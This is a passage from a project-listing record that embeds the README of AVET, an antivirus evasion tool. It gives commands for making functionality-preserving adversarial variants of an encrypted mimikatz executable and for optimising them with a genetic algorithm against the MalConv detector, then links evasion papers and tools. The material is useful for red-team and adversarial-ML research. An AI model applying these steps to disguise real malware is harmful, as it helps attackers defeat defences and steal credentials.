inputs crafted specifically to cause machine learning models to misclassify them.\n\nTo use this method, please create a virtual environment and install the needed dependencies from `requirements.txt`.\n\n### Practical Manipulations\nFive functionality-preserving manipulations for PE files are available:\n\n![Practical Manipulations](images/pm.png)\n\nTo apply a practical manipulation to the malware with random bytes injected, use the `gen_adversarial_exe` command followed by the name of the 
practical manipulation and the path to the file as parameters.\nAvailable manipulations are `full_dos`, `extend`, `shift`, `padding`, `section_injection`.\n\nFor example:\n```sh\ngen_adversarial_exe section_injection output/rc4enc_mimikatz_adversarial_win64.exe\n```\n\n### Genetic Optimizing\nInstead of injecting random content, the injected content can be optimized to achieve a higher probability of evasion.\nThe optimizer extracts benign sections from goodware and uses a genetic algorithm to optimize the injected content.\nThe content is optimized against MalConv, a static machine-learning detector built on a convolutional neural network.\nThe MalConv implementation used is from the [SecML Malware](https://github.com/pralab/secml_malware) library.\n\nGoodware is required and should be put into the `input/goodware_samples` folder.\nThe [DikeDataset](https://github.com/iosifache/DikeDataset), for example, is a good source of benign executable files. The more, the better, but 100 is sufficient for testing purposes.\n\nTo run the optimizer, use the `$genetic_optimizer` command:\n```sh\n$genetic_optimizer -pm $practical_manipulation -p $population_size output/rc4enc_mimikatz_adversarial_win64.exe\n```\nPossible options:\n```\n-p, --population_size, default=50\n-e, --elitsm, default=10\n-i, --iteration, default=10\n-pr, --penalty_regularizer, default=1e-6\n-ss, --section_size, default=10\n-pm, --practical_manipulation, default=section_injection\n```\n\nMore about adversarial examples, genetic optimizing and MalConv can be read here:\n- [Adversarial EXEmples: A Survey and Experimental Evaluation of Practical Attacks on Machine Learning for Windows Malware Detection](https://arxiv.org/abs/2008.07125)\n- [Functionality-preserving Black-box Optimization of Adversarial Windows Malware](https://arxiv.org/abs/2003.13526)\n- [Malware Detection by Eating a Whole EXE](https://arxiv.org/abs/1710.09435)\n\n\n## More\n---\n\nFor basics about antivirus evasion, AVET 
\u0026 more information have a look here (most for version 1.3): \n- [https://govolution.wordpress.com/2018/08/07/paper-avet-blackhat-usa-arsenal-2018/](https://govolution.wordpress.com/2018/08/07/paper-avet-blackhat-usa-arsenal-2018/)\n- [https://govolution.wordpress.com/2017/06/11/avet-video/](https://govolution.wordpress.com/2017/06/11/avet-video/)\n- [https://govolutionde.files.wordpress.com/2014/05/avevasion_pentestmag.pdf](https://govolutionde.files.wordpress.com/2014/05/avevasion_pentestmag.pdf)\n- [https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf](https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf)\n- [https://twitter.com/DanielX4v3r](https://twitter.com/DanielX4v3r)\n- [https://github.com/govolution/avetosx](https://github.com/govolution/avetosx)\n- [https://github.com/tacticaljmp](https://github.com/tacticaljmp)\n- [https://github.com/Mr-Un1k0d3r/DKMC](https://github.com/Mr-Un1k0d3r/DKMC)\n- [https://github.com/m0n0ph1/Basic-File-Crypter](https://github.com/m0n0ph1/Basic-File-Crypter)\n- [https://github.com/hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)\n- [https://github.com/hasherezade/demos/](https://github.com/hasherezade/demos/)\n- [https://github.com/a0rtega/pafish](https://github.com/a0rtega/pafish)\n- [https://danielsauder.com](https://danielsauder.com)\n\n","funding_links":[],"categories":["Uncategorized","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","Tools","Anti-virus Evasion Tools"],"sub_categories":["Uncategorized","\u003ca id=\"b1161d6c4cb520d0cd574347cd18342e\"\u003e\u003c/a\u003e免杀\u0026\u0026躲避AV检测","Anti-virus Evasion Tools","Tor 
Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgovolution%2Favet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgovolution%2Favet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgovolution%2Favet/lists"}